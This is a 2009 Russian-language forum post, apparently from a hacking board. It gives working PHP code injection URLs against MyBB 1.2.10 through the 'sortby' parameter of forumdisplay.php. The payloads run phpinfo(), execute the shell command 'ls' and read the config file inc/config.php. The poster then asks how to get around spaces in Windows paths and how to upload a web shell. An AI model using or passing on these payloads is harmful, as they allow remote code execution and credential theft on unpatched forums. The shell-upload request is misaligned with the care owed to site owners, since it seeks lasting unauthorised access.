Форумы Php Inj в Mybb 1.2.10

Discussion in 'Уязвимости CMS/форумов' started by TreV@N, 20 Oct 2009.

  1. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Здравствуйте.Есть уязвимость в mybb 1.210 такого вида


    Code:
    http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];phpinfo();exit;//  
    http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];system('ls');exit;// 
    http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];readfile('inc/config.php');exit;//


    Но когда я пытаюсь зайти в папку С:\\Program files\(Папки с пробелом) он почему то не заходит(пишет разные символы).В чем проблема?Как можно заменить пробел?Доступ к диску C:\ есть(Сайт стоит на denwer'e).

    И ишо вопрос как можно залить шелл?